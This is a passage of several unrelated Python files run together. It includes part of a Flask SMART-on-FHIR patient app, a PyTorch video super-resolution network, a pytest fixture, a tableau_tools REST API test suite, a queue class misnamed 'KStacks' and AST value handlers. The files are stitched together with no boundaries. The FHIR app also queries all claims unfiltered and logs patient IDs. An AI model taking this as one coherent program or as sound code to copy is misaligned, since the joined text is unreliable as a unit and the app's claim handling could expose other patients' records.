_med_name(med) else: return 'Error: medication not found' @app.route('/', methods=["GET","POST"]) def index(): username = '' name = '' smart = _get_smart() user_authenticated = False body = '' if smart.ready and smart.patient is not None: # "ready" may be true but the access token may have expired, making smart.patient = None user_authenticated = True name = smart.human_name(smart.patient.name[0] if smart.patient.name and len(smart.patient.name) > 0 else 'Unknown') if request.method == 'GET': username = name elif request.method == 'POST': username = request.form['username'] patient_id = patient_config[username] print('[ INFO ] Smart Patient_ID: {}'.format(smart.patient_id)) print('[ INFO ] Entered patient_id: {}'.format(patient_id)) ############################################## # CLAIMS ############################################## claims = [] if smart.patient_id == patient_id: #claim_bundle = Claim.where({'patient': smart.patient_id}).perform(smart.server) #print('[ INFO ] Claim JSON before: {}'.format(claim_bundle)) claim_bundle = Claim.where({}).perform(smart.server) claim_json = claim_bundle.as_json()['entry'][0]['resource']['item'] #print('[ INFO ] Claim JSON after: {}'.format(claim_bundle)) #print('[ *********** ] Claim: {}'.format(claim_bundle.as_json()['entry'][0])) for claim in claim_json: try: claim_value = claim['net']['value'] claim_desc = claim['productOrService']['text'] claims.append({'claim_desc':claim_desc, 'claim_value':claim_value}) #print('[ *********** ] Claim: {} (${})'.format(claim_desc,claim_value)) except Exception as e: print('[ EXCEPTION ] {}'.format(e)) ############################################## # Encounters ############################################## encounters = [] if smart.patient_id == patient_id: #encounter_bundle = Encounter.where({'patient': smart.patient_id}).perform(smart.server) encounter_bundle = Encounter.where({'patient': patient_id}).perform(smart.server) encounter_json = encounter_bundle.as_json()['entry'] #print('[ INFO ] Encounter JSON after: {}'.format(encounter_json)) #print('[ *********** ] Encounters: {}'.format(encounter_json)) for encounter in encounter_json: try: serviceProvider = encounter['resource']['serviceProvider']['display'] practitioner = encounter['resource']['participant'][0]['individual']['display'] encounter_date = encounter['resource']['period']['start'] encounter_desc = encounter['resource']['type'][0]['text'] encounters.append({'provider':serviceProvider, 'practitioner':practitioner, 'encounter_date':encounter_date, 'encounter_desc':encounter_desc}) except Exception as e: print('[ EXCEPTION ] {}'.format(e)) else: claims = '' encounters = '' auth_url = smart.authorize_url if auth_url is not None: body += """

Please authorize.

""".format(auth_url) else: body += """

Running against a no-auth server, nothing to demo here.

""" body += """

Reset

""" return render_template('index.html', user=name, username=username, body=body, user_authenticated=user_authenticated, claims=claims, encounters=encounters) @app.route('/fhir-app/') def callback(): """ OAuth2 callback interception. """ smart = _get_smart() try: smart.handle_callback(request.url) except Exception as e: return """

Authorization Error

{0}

Start over

""".format(e) return redirect('/') @app.route('/logout') def logout(): _logout() return redirect('/') @app.route('/reset') def reset(): _reset() return redirect('/') # start the app if '__main__' == __name__: import flaskbeaker flaskbeaker.FlaskBeaker.setup_app(app) logging.basicConfig(level=logging.DEBUG) app.run(debug=True, port=8000) import time import scipy.misc import numpy as np from math import floor, log import torch import torch.nn as nn from torch.nn import init from torch.autograd import Variable from torch.nn.functional import upsample import sys sys.path.append('flownet2-pytorch/networks') try: from submodules import * except ModuleNotFoundError: raise ModuleNotFoundError("flownet2-pytorch not found, did you update the git submodule?") def lp_error(img1, img2, lp=2): return torch.mean((img1 - img2)**lp) # https://en.wikipedia.org/wiki/Peak_signal-to-noise_ratio def psnr(img1, img2): mse = lp_error(img1, img2, 2) if mse == 0: return 100 PIXEL_MAX = 255.0 # getting the noise in dB return 20 * torch.log10(PIXEL_MAX / torch.sqrt(mse)) def rgb2ycbcr(input_tensor): # Conversion from RGB to YCbCr according to # https://en.wikipedia.org/wiki/YCbCr?section=6#JPEG_conversion # Expecting batch of RGB images with values in [0, 255] kr = 0.299 kg = 0.587 kb = 0.114 # Expecting batch of image sequence inputs with values in [0, 255] r = input_tensor[:, 0, :, :, :] g = input_tensor[:, 1, :, :, :] b = input_tensor[:, 2, :, :, :] y = torch.unsqueeze(kr * r + kg * g + kb * b, 1) cb = torch.unsqueeze(128 - (0.1687346 * r) - (0.331264 * g) + (0.5 * b), 1) cr = torch.unsqueeze(128 + (0.5 * r) - (0.418688 * g) - (0.081312 * b), 1) return y, cb, cr def ycbcr2rgb(input_tensor): # Conversion from YCbCr to RGB according to # https://en.wikipedia.org/wiki/YCbCr/16?section=6#JPEG_conversion # Expecting batch of YCbCr images with values in [0, 255] y = input_tensor[:, 0, :, :] cb = input_tensor[:, 1, :, :] cr = input_tensor[:, 2, :, :] r = y + 1.402 * (cr - 128) g = y - 0.344136 * (cb - 128) - 0.714136 * (cr - 128) b = y + 1.772 * (cb - 128) r = torch.unsqueeze(r, 1) g = torch.unsqueeze(g, 1) b = torch.unsqueeze(b, 1) return torch.clamp(torch.cat((r, g, b), 1), 0, 255) def get_grid(batchsize, rows, cols, fp16): # Input is a tensor with shape [batchsize, channels, rows, cols] # Output is tensor with shape [batchsize, 2, rows, cols] # where each col in [:, 1, :, :] and each row in [:, 0, :, :] # is an evenly spaced arithmetic progression from -1.0 to 1.0 hor = torch.linspace(-1.0, 1.0, cols) hor = hor.view(1, 1, 1, cols) hor = hor.expand(batchsize, 1, rows, cols) ver = torch.linspace(-1.0, 1.0, rows) ver = ver.view(1, 1, rows, 1) ver = ver.expand(batchsize, 1, rows, cols) t_grid = torch.cat([hor, ver], 1) if fp16: return Variable(t_grid.half().cuda()) else: return Variable(t_grid.cuda()) def tensorboard_image(name, image, iteration, writer): # tensorboardX expects CHW images out_im = image.data.cpu().numpy().astype('uint8') writer.add_image(name, out_im, iteration) class VSRNet(nn.Module): def __init__(self, frames=3, flownet_path='', fp16=False): super(VSRNet, self).__init__() self.frames = frames self.fp16 = fp16 self.mi = floor(self.frames / 2) self.pooling = nn.AvgPool2d(4, ceil_mode=False) self.upsample = nn.Upsample(scale_factor=4, mode='bilinear') if fp16: #from FlowNetSD16 import FlowNetSD from FlowNetSD import FlowNetSD else: from FlowNetSD import FlowNetSD FlowNetSD_network = FlowNetSD(args=[], batchNorm=False) try: FlowNetSD_weights = torch.load(flownet_path)['state_dict'] except: raise IOError('FlowNet weights could not be loaded from %s' % flownet_path) FlowNetSD_network.load_state_dict(FlowNetSD_weights) self.FlowNetSD_network = FlowNetSD_network self.train_grid = None self.val_grid = None self.batchNorm = True self.conv1 = conv(self.batchNorm, 1, 64, kernel_size=9) self.conv2 = conv(self.batchNorm, 64 * self.frames, 32, kernel_size=5) self.conv3 = nn.Conv2d(32, 1, kernel_size=5, stride=1, padding=2, bias=True) self.conv3.weight = torch.nn.init.normal(self.conv3.weight, 0, 0.1) def forward(self, inputs, iteration, writer, im_out=False): batchsize, channels, frames, rows, cols = inputs.size() # inputs are normalized y, cb, cr = rgb2ycbcr(inputs) y /= 255 target = y[:, :, self.mi, :, :] if writer is not None and im_out: out_im = inputs[0, :, self.mi, :, :] # / 255.0 will we need this? tensorboard_image('target', out_im, iteration, writer) out_im = self.pooling(out_im) tensorboard_image('downsampled', out_im, iteration, writer) out_im = self.upsample(out_im.unsqueeze(0)).squeeze(0) tensorboard_image('upsampled', out_im, iteration, writer) # Compute per RGB channel mean across pixels for each image in input batch rgb_mean = inputs.view((batchsize, channels) + (-1, )).float().mean(dim=-1) rgb_mean = rgb_mean.view((batchsize, channels) + (1, 1, 1, )) if self.fp16: rgb_mean = rgb_mean.half() inputs = (inputs - rgb_mean) / 255 if self.training: if self.train_grid is None: self.train_grid = get_grid(batchsize, rows, cols, self.fp16) grid = self.train_grid else: if self.val_grid is None: self.val_grid = get_grid(batchsize, rows, cols, self.fp16) grid = self.val_grid grid.requires_grad = False downsampled_input = self.pooling(cb[:, :, self.mi, :, :]) cb[:, :, self.mi, :, :] = self.upsample(downsampled_input) downsampled_input = self.pooling(cr[:, :, self.mi, :, :]) cr[:, :, self.mi, :, :] = self.upsample(downsampled_input) conv1_out = [] for fr in range(self.frames): downsampled_input = self.pooling(y[:, :, fr, :, :]) y[:, :, fr, :, :] = self.upsample(downsampled_input) if fr == self.mi: conv1_out.append(self.conv1(y[:, :, self.mi, :, :])) else: im1 = inputs[:, :, fr, :, :] im2 = inputs[:, :, self.mi, :, :] im_pair = torch.cat((im2, im1), 1) to_warp = y[:, :, fr, :, :] flow = self.upsample(self.FlowNetSD_network(im_pair)[0]) / 16 flow = torch.cat([flow[:, 0:1, :, :] / ((cols - 1.0) / 2.0), flow[:, 1:2, :, :] / ((rows - 1.0) / 2.0)], 1) warped = torch.nn.functional.grid_sample( input=to_warp, grid=(grid + flow).permute(0, 2, 3, 1), mode='bilinear', padding_mode='border') conv1_out.append(self.conv1(warped)) conv1_out = torch.cat(conv1_out, 1) conv2_out = self.conv2(conv1_out) # Loss must be computed for pixel values in [0, 255] to prevent # divergence in fp16 prediction = torch.nn.functional.sigmoid(self.conv3(conv2_out).float()) loss = torch.nn.functional.mse_loss(prediction.float(), target.float()) if not self.training: # Following [1], remove 12 pixels around border to prevent # convolution edge effects affecting PSNR psnr_metric = psnr(prediction[:, :, 12:, :-12].float() * 255, target[:, :, 12:, :-12].float() * 255) prediction = ycbcr2rgb(torch.cat((prediction * 255, cb[:, :, self.mi, :, :], cr[:, :, self.mi, :, :]), 1)) if writer is not None and im_out: out_im = prediction[0, :, :, :] tensorboard_image('prediction', out_im, iteration, writer) if self.training: return loss else: return loss, psnr_metric # [1] , , , "End-to-End Learning of Video Super-Resolution with Motion Compensation", https://arxiv.org/abs/1707.00471 # -*- coding: utf-8 -*- import pytest @pytest.fixture def my_case_instance_json(): return { 'id': 'anId', 'caseDefinitionId': 'aDefinitionId', 'tenantId': 'aTenantId', 'businessKey': 'aBusinessKey', 'active': True } examples/tableau_tools_methods_test_suite.py # -*- coding: utf-8 -*- from tableau_tools.tableau_rest_api import * from tableau_tools import * import time # This is meant to test all relevant functionality of the tableau_tools library. # It does a lot of things that you wouldn't necessarily do just to make sure they work # Other than printing messages before and afte each test, logging of what actually happens going into the log file # rather than to the console. # Allows for testing against multiple versions of Tableau Server. Feel free to use just one servers = { # u"9.0": {u"server": u"http://127.0.0.1", u"username": u"", u"password": u""}, # u"9.1": {u"server": u"http://127.0.0.1", u"username": u"", u"password": u""}, # u"9.2": {u"server": u"http://127.0.0.1", u"username": u"", u"password": u""}, # u"9.3": {u"server": u"http://127.0.0.1", u"username": u"", u"password": u""}, # u'10.0': {u"server": u"http://127.0.0.1", u"username": u"", u"password": u""}, # u'10.1': {u"server": u"http://127.0.0.1", u"username": u"", u"password": u""}, # u"10.2": {u"server": u"http://127.0.0.1", u"username": u"", u"password": u""}, #u"10.3": {u"server": u"http://127.0.0.1", u"username": u"", u"password": u""}, #u"10.4": {u"server": u"http://127.0.0.1", u"username": u"", u"password": u""}, #u"10.5": {u"server": u"http://127.0.0.1", u"username": u"", u"password": u""}, u"10.5 Linux": {u"server": u"http://127.0.0.1", u"username": u"", u"password": u""} } # Configure which tests you want to run in here def run_tests(server_url, username, password): # There are used to ensure that Unicode is being handled correctly. They are random but hit a lot of character sets words = [u'ASCII', u'Οὐχὶ ταὐτὰ', u'γιγνώσκειν', u'რეგისტრაცია', u'Международную', u'โฮจิ๋นเรียกทัพทั่วหัวเมืองมา', u'አይተዳደርም።', u'晚飯', u'晩ご飯', u'저녁밥', u'bữa ăn tối', u'Señor'] log_obj = Logger(u'tableau_tools_test.log') # Test Files to Publish twbx_filename = u'test_workbook_excel.twbx' # Replace with your own test file twbx_content_name = u'Test TWBX workbook' # Replace with your own name twb_filename = u'twb_workbook.twb' # Replace with your own file twb_content_name = u'Test Live Connection Workbook' tdsx_filename = u'test_datasource.tdsx' # Replace with your own test file tdsx_content_name = u'Test TDSX Datasource' # Use your own name tds_filename = u'test_live_datasource.tds' # Replace with your test file tds_content_name = u'Test TDS Live Data Source' # End Test Files # Create a default connection default = TableauRestApiConnection26(server_url, username, password, site_content_url=u'default') default.signin() default.enable_logging(log_obj) # Step 1: Creating a test site test_site = create_test_site(default, server_url, username, password, log_obj) # Step 2: Project tests project_tests(test_site, words) # Step 3: Group tests group_tests(test_site, words) # Step 4: Project Permissions tests version = test_site.api_version # very few people still using 9.0-9.1, but permissions works the same without the default permissions if version != u'2.0': project_permissions_tests21(test_site) # Step 5: User Tests user_tests(test_site, words) # Step 6: Publishing Workbook Tests workbooks_test(test_site, twbx_filename, twbx_content_name) # Step 7: Subscription tests #if isinstance(test_site, TableauRestApiConnection23): # subscription_tests(test_site) # Step 8: Publishing Datasource tests #publishing_datasources_test(test_site, tdsx_filename, tdsx_content_name) # These capabilities are only available in later API versions # Step 9: Scheduling tests #if isinstance(test_site, TableauRestApiConnection23): # schedule_test(test_site) # Step 10: Extract Refresh tests def create_test_site(default_site, server_url, username, password, logger): """ :type default_site: TableauRestApiConnection :type server_url: unicode :type username: unicode :type password: unicode :type logger: Logger :rtype: TableauRestApiConnection25 """ print(u"Creating a test site") logger.log(u'Creating test site') # Assign this however you'd like new_site_content_url = u'tableau_tools' new_site_name = u'Test Site 1' new_site_name_to_change_to = u'Test Site - tableau_tools' # Determine if site exists with current name. Delete if it does. # Then create new site with the same name and contentUrl try: logger.log(u'Received content_url to delete {}'.format(new_site_content_url)) test_site = TableauRestApiConnection25(server_url, username, password, new_site_content_url) test_site.signin() test_site.enable_logging(logger) logger.log(u'Signed in successfully to {}'.format(new_site_content_url)) site_xml = test_site.query_current_site() logger.log(u'Attempting to delete current site') test_site.delete_current_site() logger.log(u"Deleted site {}".format(new_site_name)) except RecoverableHTTPException as e: logger.log(e.tableau_error_code) logger.log(u"Cannot delete site that does not exist, assuming it already exists and continuing") try: # Create the new site logger.log(u'Now going into the create site') default_site.log(u'Logging with the log function') new_site_id = default_site.create_site(new_site_name, new_site_content_url) logger.log(u'Created new site ' + new_site_id) # This shouldn't happen if the existing check and delete happened earlier, but might as well protect except AlreadyExistsException as e: print(e.msg) print(u"Cannot create new site due to error, exiting") exit() # Once we've created the site, we need to sign into it to do anything else test_site = TableauRestApiConnection25(server_url, username, password, site_content_url=new_site_content_url) test_site.signin() test_site.enable_logging(logger) logger.log(u'Signed in successfully to ' + new_site_content_url) # Update the site name logger.log(u'Updating site name') test_site.update_site(site_name=new_site_name_to_change_to) logger.log(u'Updating everything about site') if isinstance(test_site, TableauRestApiConnection23): # If e-mail subscriptions are disabled for the Server, this comes back with an error #test_site.update_site(content_url=new_site_content_url, admin_mode=u'ContentAndUsers', user_quota=u'30', # storage_quota=u'400', disable_subscriptions=False, state=u'Active', # revision_history_enabled=True, revision_limit=u'15') test_site.update_site(content_url=new_site_content_url, admin_mode=u'ContentAndUsers', user_quota=u'30', storage_quota=u'400', state=u'Active', revision_history_enabled=True, revision_limit=u'15') else: test_site.update_site(content_url=new_site_content_url, admin_mode=u'ContentAndUsers', user_quota=u'30', storage_quota=u'400', disable_subscriptions=False, state=u'Active') logger.log(u"Getting all site_content_urls on the server") all_site_content_urls = test_site.query_all_site_content_urls() logger.log(unicode(all_site_content_urls)) test_site.query_sites() print(u'Finished creating new site') return test_site def project_tests(t_site, project_names): """ :type t_site: TableauRestApiConnection :type project_names: list[unicode] """ print(u'Testing project methods') for project in project_names: t_site.log(u"Creating Project {}".format(project).encode(u'utf8')) t_site.create_project(project, project_desc=u'I am a not a folder, I am project', no_return=True) # Sleep ensures we don't get ahead of the REST API updating with the new projects time.sleep(4) t_site.log(u'Updating first project') t_site.update_project(project_names[0], new_project_name=u'Updated {}'.format(project_names[0]), new_project_description=u'This is only for important people') t_site.log(u"Deleting second and third projects") t_site.delete_projects([project_names[1], project_names[2]]) print(u"Finished testing project methods") def group_tests(t_site, group_names): """ :type t_site: TableauRestApiConnection21 :param group_names: :return: """ print u"Starting group tests" for group in group_names: t_site.log(u"Creating Group {}".format(group)) new_group_luid = t_site.create_group(group) # Let all of the groups settle in time.sleep(3) t_site.log(u'Updating first group name') t_site.update_group(group_names[0], u'{} (updated)'.format(group_names[0])) # Delete Groups not introduced until API 2.1 if isinstance(t_site, TableauRestApiConnection21): t_site.log(u'Deleting fourth group') t_site.delete_groups(group_names[3]) t_site.log(u"Querying all the groups") groups_on_site = t_site.query_groups() # Convert the list to a dict {name : luid} groups_dict = t_site.convert_xml_list_to_name_id_dict(groups_on_site) t_site.log(unicode(groups_dict)) print(u'Finished group tests') time.sleep(3) # Let everything update return groups_dict def project_permissions_tests21(t_site): """ :type t_site: TableauRestApiConnection21 :return: """ print(u"Starting Permissions tests") projects = t_site.query_projects() projects_dict = t_site.convert_xml_list_to_name_id_dict(projects) project_names = projects_dict.keys() groups = t_site.query_groups() groups_dict = t_site.convert_xml_list_to_name_id_dict(groups) group_names = groups_dict.keys() # Set permissions for one project t_site.log(u'Querying project called {}'.format(project_names[0])) proj_1 = t_site.query_project(projects_dict[project_names[0]]) t_site.log(u'Setting project to locked permissions') proj_1.lock_permissions() t_site.log(u'Clearing all existing permissions on first project') proj_1.clear_all_permissions() proj_perms_list = [] for group in groups_dict: proj_perms = proj_1.create_project_permissions_object_for_group(groups_dict[group], u'Viewer') proj_perms_list.append(proj_perms) proj_1.set_permissions_by_permissions_obj_list(proj_perms_list) # WB defaults wb_perms_list = [] for group in groups_dict: wb_perms = proj_1.create_workbook_permissions_object_for_group(groups_dict[group], u'Interactor') wb_perms_list.append(wb_perms) t_site.log(u'Setting workbook permissions') proj_1.workbook_defaults.set_permissions_by_permissions_obj_list(wb_perms_list) # DS defaults ds_perms_list = [] for group in groups_dict: ds_perms = proj_1.create_datasource_permissions_object_for_group(groups_dict[group], u'Editor') ds_perms_list.append(ds_perms) t_site.log(u'Setting datasource permissions') proj_1.datasource_defaults.set_permissions_by_permissions_obj_list(ds_perms_list) # Second Project t_site.log(u'Querying project called {}'.format(project_names[5])) proj_2 = t_site.query_project(projects_dict[project_names[5]]) t_site.log(u'Unlocking permissions') proj_2.unlock_permissions() proj_2.clear_all_permissions(clear_defaults=False) # Don't clear workbook or datasource defaults proj_perms = proj_2.create_project_permissions_object_for_group(groups_dict[group_names[6]]) proj_perms.set_all_to_allow() proj_perms.set_capability_to_unspecified(u'Save') t_site.log(u'Setting project permissions for group {}'.format(group_names[6])) proj_2.set_permissions_by_permissions_obj_list([proj_perms, ]) # Clone Permissions from one to another t_site.log(u'Cloning project permissions from {} to {}'.format(project_names[3], project_names[0])) proj_3 = t_site.query_project(projects_dict[project_names[3]]) proj_3.replicate_permissions(proj_1) print u'Finished Permissions tests' def user_tests(t_site, names): """ :type t_site: TableauRestApiConnection :type names: list[unicode] :return: """ print(u'Starting User tests') # Create some fake users to assign to groups new_user_luids = [] for name in names: username = name full_name = name.upper() t_site.log(u"Creating User '{}' named '{}'".format(username, full_name)) try: new_user_luid = t_site.add_user(username, full_name, u'Interactor', u'password', username + u'') except InvalidOptionException as e: print(e.msg) raise new_user_luids.append(new_user_luid) # This takes Users x Groups amount of time to complete, can really stretch out the test groups = t_site.query_groups() groups_dict = t_site.convert_xml_list_to_name_id_dict(groups) group_names = groups_dict.keys() # Add all users to first group t_site.log(u"Adding users to group {}".format(group_names[0])) t_site.add_users_to_group(new_user_luids, groups_dict[group_names[0]]) # Add first three users to second gruop t_site.log(u"Adding users to group {}".format(group_names[1])) t_site.add_users_to_group([new_user_luids[0], new_user_luids[1], new_user_luids[3]], group_names[1]) # Remove sixth user from first gruop t_site.log(u'Removing user {} from group {}'.format(new_user_luids[5], group_names[0])) t_site.remove_users_from_group(new_user_luids[5], groups_dict[group_names[0]]) t_site.log(u'Unlicensing the second user') t_site.update_user(new_user_luids[1], site_role=u'Unlicensed') t_site.log(u'Updating second user') t_site.update_user(new_user_luids[1], full_name=u'', password=u'', email=u'') t_site.log(u'Removing the third user') t_site.remove_users_from_site(new_user_luids[2]) # Sleep to let updates happen time.sleep(4) users = t_site.query_users() users_dict = t_site.convert_xml_list_to_name_id_dict(users) t_site.log(unicode(users_dict.keys())) if isinstance(t_site, TableauRestApiConnection25): name_sort = Sort(u'name', u'desc') if isinstance(t_site, TableauRestApiConnection28): role_f = UrlFilter28.create_site_roles_filter([u'Interactor', u'Publisher']) else: role_f = UrlFilter25.create_site_role_filter(u'Interactor') ll_f = UrlFilter25.create_last_login_filter(u'gte', u'2018-01-01T00:00:00:00Z') users = t_site.query_users(sorts=[name_sort, ], site_role_filter=role_f, last_login_filter=ll_f) t_site.log(u'Here are sorted and filtered users') for user in users: t_site.log(user.get(u'name')) print(u'Finished User tests') def workbooks_test(t_site, twbx_filename, twbx_content_name, twb_filename=None, twb_content_name=None): """ :type t_site: TableauRestApiConnection :type twbx_filename: unicode :type twbx_content_name: unicode :type twb_filename: unicode :type twb_content_name: unicode :return: """ print(u"Starting Workbook tests") default_project = t_site.query_project(u'Default') t_site.log(u'Publishing workbook as {}'.format(twbx_content_name)) new_wb_luid = t_site.publish_workbook(twbx_filename, twbx_content_name, default_project, overwrite=True) # Repeat Multiple times to creates some revisions time.sleep(3) new_wb_luid = t_site.publish_workbook(twbx_filename, twbx_content_name, default_project, overwrite=True) time.sleep(3) new_wb_luid = t_site.publish_workbook(twbx_filename, twbx_content_name, default_project, overwrite=True) time.sleep(3) # Publish second one to be deleted new_wb_luid_2 = t_site.publish_workbook(twbx_filename, u"{} - 2".format(twbx_content_name), default_project, overwrite=True) time.sleep(3) projects = t_site.query_projects() projects_dict = t_site.convert_xml_list_to_name_id_dict(projects) projects_list = projects_dict.keys() t_site.log(u'Moving workbook to {} project'.format(projects_list[0])) t_site.update_workbook(new_wb_luid, default_project.luid, new_project_luid=projects_dict[projects_list[0]], show_tabs=True) t_site.log(u"Querying workbook") t_site.query_workbook(new_wb_luid) # Save workbook preview image t_site.log(u"Saving workbook preview image") t_site.save_workbook_preview_image(new_wb_luid, u'Workbook preview') t_site.log(u"Downloading workbook file") t_site.download_workbook(new_wb_luid, u'saved workbook') t_site.log(u"Query workbook connections") t_site.query_workbook_connections(new_wb_luid) t_site.log(u"Querying workbook views") wb_views = t_site.query_workbook_views(new_wb_luid) wb_views_dict = t_site.convert_xml_list_to_name_id_dict(wb_views) t_site.log(unicode(wb_views_dict)) for wb_view in wb_views_dict: t_site.log(u"Adding {} to favorites for me".format(wb_view)) t_site.add_view_to_user_favorites(u'Fav - {}'.format(wb_view), t_site.username, wb_view, wb_name_or_luid=new_wb_luid) for wb_view in wb_views_dict: t_site.log(u"Deleting {} from favorites for me".format(wb_view)) t_site.delete_views_from_user_favorites(wb_views_dict.get(wb_view), t_site.username, new_wb_luid) t_site.log(u'Adding tags to workbook') t_site.add_tags_to_workbook(new_wb_luid, [u'workbooks', u'flights', u'cool', u'晚飯']) t_site.log(u'Deleting a tag from workbook') t_site.delete_tags_from_workbook(new_wb_luid, u'flights') t_site.log(u"Add workbook to favorites for me") t_site.add_workbook_to_user_favorites(u'My favorite workbook', new_wb_luid, t_site.username) t_site.log(u"Deleting workbook from favorites for me") t_site.delete_workbooks_from_user_favorites(new_wb_luid, t_site.username) # # Saving view as file # for wb_view in wb_views_dict: # t_site.log(u"Saving a png for {}".format(wb_view) # t_site.save_workbook_view_preview_image(wb_luid, wb_views_dict.get(wb_view), '{}_preview'.format(wb_view)) t_site.log(u'Deleting workbook') t_site.delete_workbooks(new_wb_luid_2) print(u'Finished Workbook tests') def publishing_datasources_test(t_site, tdsx_file, tdsx_content_name): """ :type t_site: TableauRestApiConnection :param tdsx_file: :param tdsx_content_name: :return: """ print(u"Starting Datasource tests") default_project = t_site.query_project(u'Default') t_site.log(u"Publishing as {}".format(tdsx_content_name)) new_ds_luid = t_site.publish_datasource(tdsx_file, tdsx_content_name, default_project, overwrite=True) time.sleep(3) projects = t_site.query_projects() projects_dict = t_site.convert_xml_list_to_name_id_dict(projects) projects_list = projects_dict.keys() t_site.log(u'Moving datasource to {} project'.format(projects_list[1])) t_site.update_datasource(new_ds_luid, default_project.luid, new_project_luid=projects_dict[projects_list[1]]) t_site.log(u"Querying datasource") t_site.query_workbook(new_ds_luid) t_site.log(u'Downloading and saving datasource') t_site.download_datasource(new_ds_luid, u'saved_datasource') # Can't add to favorites until API version 2.3 if isinstance(t_site, TableauRestApiConnection23): t_site.log(u'Adding to Favorites') t_site.add_datasource_to_user_favorites(u'The Greatest Datasource', new_ds_luid, t_site.username) t_site.log(u'Removing from Favorites') t_site.delete_datasources_from_user_favorites(new_ds_luid, t_site.username) # t_site.log("Publishing TDS with credentials -- reordered args") # tds_cred_luid = t_site.publish_datasource('TDS with Credentials.tds', 'TDS w Creds', project, # connection_username='postgres', overwrite=True, connection_password='') # t_site.log("Update Datasource connection") # t_site.update_datasource_connection(tds_cred_luid, 'localhost', '5432', db_username, db_password) # t_site.log("Deleting the published DS") # t_site.delete_datasources(new_ds_luid) print(u'Finished Datasource Tests') def schedule_test(t_site): """ :type t_site: TableauRestApiConnection23 :return: """ print(u'Started Schedule tests') all_schedules = t_site.query_schedules() schedule_dict = t_site.convert_xml_list_to_name_id_dict(all_schedules) t_site.log(u'All schedules on Server: {}'.format(unicode(schedule_dict))) try: t_site.log(u'Creating a daily extract schedule') t_site.create_daily_extract_schedule(u'Afternoon Delight', start_time=u'13:00:00') except AlreadyExistsException as e: t_site.log(u'Skipping the add since it already exists') try: t_site.log(u'Creating a monthly subscription schedule') new_monthly_luid = t_site.create_monthly_subscription_schedule(u'First of the Month', u'1', start_time=u'03:00:00', parallel_or_serial=u'Serial') t_site.log(u'Deleting monthly subscription schedule LUID {}'.format(new_monthly_luid)) time.sleep(4) t_site.delete_schedule(new_monthly_luid) except AlreadyExistsException as e: t_site.log(u'Skipping the add since it already exists') try: t_site.log(u'Creating a monthly extract schedule') t_site.create_monthly_extract_schedule(u'Last Day of Month', u'LastDay', start_time=u'03:00:00', priority=25) except AlreadyExistsException as e: t_site.log(u'Skipping the add since it already exists') try: t_site.log(u'Creating a weekly extract schedule') weekly_luid = t_site.create_weekly_subscription_schedule(u'Mon Wed Fri', [u'Monday', u'Wednesday', u'Friday'], start_time=u'05:00:00') time.sleep(4) t_site.log(u'Updating schedule with LUID {}'.format(weekly_luid)) t_site.update_schedule(weekly_luid, new_name=u'Wed Fri', interval_value_s=[u'Wednesday', u'Friday']) except AlreadyExistsException as e: t_site.log(u'Skipping the add since it already exists') print(u'Finished Schedule tests') def subscription_tests(t_site): """ :type t_site: TableauRestApiConnection23 :return: """ print(u'Starting Subscription tests') # All users in a Group groups = t_site.query_groups() groups_dict = t_site.convert_xml_list_to_name_id_dict(groups) group_names = groups_dict.keys() users_in_group = t_site.query_users_in_group(groups_dict[group_names[0]]) users_dict = t_site.convert_xml_list_to_name_id_dict(users_in_group) usernames = users_dict.keys() wbs = t_site.query_workbooks() wbs_dict = t_site.convert_xml_list_to_name_id_dict(wbs) wb_names = wbs_dict.keys() # Grab first workbook wb_luid = wbs_dict[wb_names[0]] sub_schedules = t_site.query_subscription_schedules() sched_dict = t_site.convert_xml_list_to_name_id_dict(sub_schedules) sched_names = sched_dict.keys() # Grab first schedule sched_luid = sched_dict[sched_names[0]] # Subscribe them to the first workbook t_site.log(u'Adding subscription with subject Important weekly update to first workbook for all users in group 1') for user in users_dict: t_site.create_subscription_to_workbook(u'Important weekly update', wb_luid, sched_luid, users_dict[user]) # Find the subscriptions for user 1, delete t_site.query_subscriptions() user_1_subs = t_site.query_subscriptions(username_or_luid=usernames[0]) t_site.log(u'Deleting all subscriptions for user 1') for sub in user_1_subs: luid = sub.get(u'id') t_site.delete_subscriptions(luid) # Update user 2 subscriptions t_site.log(u'Updating user 2s subscriptions to second schedule') user_2_subs = t_site.query_subscriptions(username_or_luid=usernames[1]) for sub in user_2_subs: luid = sub.get(u'id') t_site.update_subscription(luid, schedule_luid=sched_dict[sched_names[1]]) print(u'Finished subscription tests') def revision_tests(t_site, workbook_name, project_name): """ :type t_site: TableauRestApiConnection23 :return: """ print(u'Starting revision tests') revisions = t_site.get_workbook_revisions(workbook_name, project_name) t_site.log(u'There are {} revisions of workbook {}'.format(len(revisions), workbook_name)) print(u'Finished revision tests') def extract_refresh_test(t_site): """ :type t_site: TableauRestApiConnection26 :return: """ # Only possible in 10.3 / API 2.6 and above if isinstance(t_site, TableauRestApiConnection26): print(u'Starting Extract Refresh tests') tasks = t_site.get_extract_refresh_tasks() print(u'Finished Extract Refresh tests') for server in servers: print u"Logging in to {}".format(servers[server][u'server']) run_tests(servers[server][u'server'], servers[server][u'username'], servers[server][u'password']) class KStacks(): def __init__(self, k, capacity): self.nextAvailable = 0 self.data = [0] * capacity self.front = [-1] * k self.rear = [-1] * k self.nextIndex = [i+1 for i in range(capacity)] self.nextIndex[capacity-1] = -1 def isFull(self): return self.nextAvailable == -1 def isEmpty(self, k): return self.front[k] == -1 def enqueue(self, k, data): if self.isFull(): return nextFree = self.nextIndex[self.nextAvailable] if self.isEmpty(k): self.front[k] = self.rear[k] = self.nextAvailable else: self.rear[k] = self.nextAvailable self.nextIndex[ self.front[k] ] = self.nextAvailable self.nextIndex[self.nextAvailable] = -1 self.data[ self.nextAvailable ] = data self.nextAvailable = nextFree def dequeue(self, k): if self.isEmpty(k): return None fetch_index = self.front[k] ret_data = self.data[fetch_index] self.front[k] = self.nextIndex[fetch_index] self.nextIndex[fetch_index] = self.nextAvailable self.nextAvailable = fetch_index return ret_data if __name__ == '__main__': k_stack = KStacks(3, 4) k_stack.enqueue(0, 10) k_stack.enqueue(1, 20) k_stack.enqueue(2, 30) k_stack.enqueue(0, 40) k_stack.enqueue(1, 50) k_stack.dequeue(0) k_stack.dequeue(1) from .. import value def Num(node): return value.Value(node.n), [] def Str(node): return value.Value(node.s), [] def Bytes(node): return value.Value(node.s), [] def NameConstant(node): return value.Value(node.value), [] def List(node): return lambda *d: list(d), node.elts def Tuple(node): return lambda *d: tuple(d), node.elts def Set(node): return lambda *d: set(d), node.elts def Dict(node): assert len(node.keys) == len(node.values) length = len(node.keys) def make_dict(*keys_values): keys, values = keys_values[:length], keys_values[length:] return {k: v for k, v in zip(keys, values)} return make_dict, list(node.keys) + list(node.values) def 